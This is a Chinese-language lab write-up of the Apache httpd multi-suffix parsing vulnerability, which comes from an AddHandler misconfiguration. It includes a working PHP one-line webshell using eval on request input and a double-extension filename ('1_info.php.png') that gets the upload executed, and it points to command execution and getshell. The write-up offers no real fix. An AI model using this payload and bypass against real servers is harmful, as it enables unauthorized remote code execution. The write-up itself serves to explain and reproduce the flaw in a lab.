Apache-ttpd_多后缀名解析漏洞
| 说明 | 内容 |
|---|---|
| 漏洞编号 | |
| 漏洞名称 | apache httpd 多后缀解析漏洞 |
| 漏洞评级 | 高危 |
| 影响范围 | 该漏洞并不是apache程序本身的问题,而是管理员配置不当造成 |
| 漏洞描述 | Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令 |
| 修复方案 |
漏洞描述
该漏洞并不是apache程序本身的问题,而是管理员配置不当造成。Apache支持一个文件具有多个后缀,并为不同的后缀执行不同的指令。
漏洞等级
高危
影响版本
- 该漏洞并不是apache程序本身的问题,而是管理员配置不当造成
漏洞复现
基础环境
| 组件 | 版本 |
|---|---|
| OS | kali-linux |
| Web Server | chrome |
漏洞验证
-
启动环境,访问主页

-
上传一个php文件,内容为一句话木马+phpinfo,进行抓包
<?php @eval($_REQUEST[777]);phpinfo();
-
修改后缀名为任意字符
filename="1_info.cwc
-
修改文件后缀为png
filename="1_info.php.png
-
访问文件
http://192.168.117.163/uploadfiles/1_info.php.png
原理是AddHandler配置,遇到.php就将文件作为php文件进行执行;但并不是以.php结尾,只要文件名中含有.php,就会作为php文件执行

深度利用
命令执行
可以进行命令执行
GetShell
可以上传一句话木马进行getshell
漏洞挖掘
网络测绘
apache httpd
修复建议
无
Apache服务器存在高危漏洞,源于管理员配置不当,允许非.php后缀文件通过AddHandler执行PHP代码。攻击者可利用此漏洞进行命令执行和可能的GetShell。修复建议缺失,用户应检查和修正配置以防止此类攻击。
8334

被折叠的 条评论
为什么被折叠?



